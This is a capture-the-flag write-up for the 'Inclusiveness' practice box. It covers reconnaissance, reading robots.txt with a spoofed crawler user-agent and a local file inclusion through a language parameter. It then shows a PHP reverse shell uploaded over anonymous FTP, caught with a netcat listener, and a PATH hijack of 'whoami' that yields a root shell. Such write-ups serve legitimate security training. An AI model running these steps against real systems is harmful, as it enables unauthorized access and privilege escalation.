Proving Grounds: Inclusiveness
- TLDR -

...

Intro:

'Twas a nice box, great confidence booster! Find a way to access the robots.txt page, then exploit an LFI to get a reverse shell. Finally, grab root from a command hijack.

Recon:

Start with an nmap to find the target IP as well as open ports: nmap -sT -sV -A -v <target range>. Ports 21, 22, and 80 are open on our target.

Checking the webpage shows the default Apache2 "It works!" page. We can find directories and files with gobuster: gobuster dir -x .php,.html,.txt,.cgi -u <target ip> -w <wordlist>. We see some standard inaccessible directories (JS, CSS, etc...), as well as robots.txt and some related files (robots.php, seo.html, etc...). Trying to access any of these files returns a suspicious sentence: "You are not a search engine! You can't read my robots.txt!". This doesn't seem like a standard error message, so we will pursue it and try to access the robots.txt file.

We can briefly check the FTP server, which allows anonymous logins. There are no contents other than an empty "pub" directory. However, we are able to write to this folder, which we'll keep in our back pocket.

Accessing robots.txt:

The error message returned when trying to access robots.txt indicates that we need to spoof a web crawler. To do this, we find a web crawler user-agent: Googlebot/2.1 (+http://www.google.com/bot.html). We can then simply access the file using curl, while adding the spoofed user-agent header: curl -H 'User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)' <target ip>/robots.txt. This will show us a secret directory: "/secret_information/".

Finding the LFI:

Accessing this secret directory brings us a page explaining a DNS Zone Transfer Attack. There are also two links that each change the page's language: "english" and "spanish". Clicking either link sends a request to the current page with the url parameter of lang="en.php", for English in this case. Suspecting an LFI attack, we can try changing the "en.php" to "/etc/passwd". This allows us to dump the passwd file's contents!

Getting A Shell:

Because we can reach local files, and we know the server accepts php (from the "en.php" file), we can run a php reverse shell. To upload the shell, we need to anonymously connect to the ftp server, navigate to the "pub" directory, and upload the reverse shell. Assuming you're in the rshell directory:
ftp <target ip>
#Login anonymously
cd pub
put php_reverse_shell.php

Setup a netcat listener (nc -lvp 3184) and navigate to the reverse shell in your browser. The default FTP server's root is located at "/var/ftp/", so we need to go to "http:///secret_information/?lang=/var/ftp/pub/php_reverse_shell.php". We should see a connection on our listener. Upgrade the shell: python -c 'import pty;pty.spawn("/bin/bash")' . We find a user "tom" who's home directory has some interesting files...

Getting Root:

In Tom's home directory, we find a pair of files: "rootshell" and "rootshell.c". Checking out the rootshell.c code we find that it spawns an EUID root shell if the user's name is "tom". This is verified by the "whoami" command.

We can hijack the whoami command and write a script that simply prints "tom". To do this, we need to move to a writeable directory, such as "/tmp". Create a file named "whoami" with executable permission. This file will be a bash script that echoes "tom". We can do this in a one-liner: echo $'#!/bin/bash echo "tom"' > ./whoami; chmod +x ./whoami. Next, add /tmp to the PATH env: export PATH=/tmp:${PATH}. Finally, we can move back into tom's home dir and execute the rootshell! Once we're in, grab the flag and celebrate!



Last edit: 2021.09.09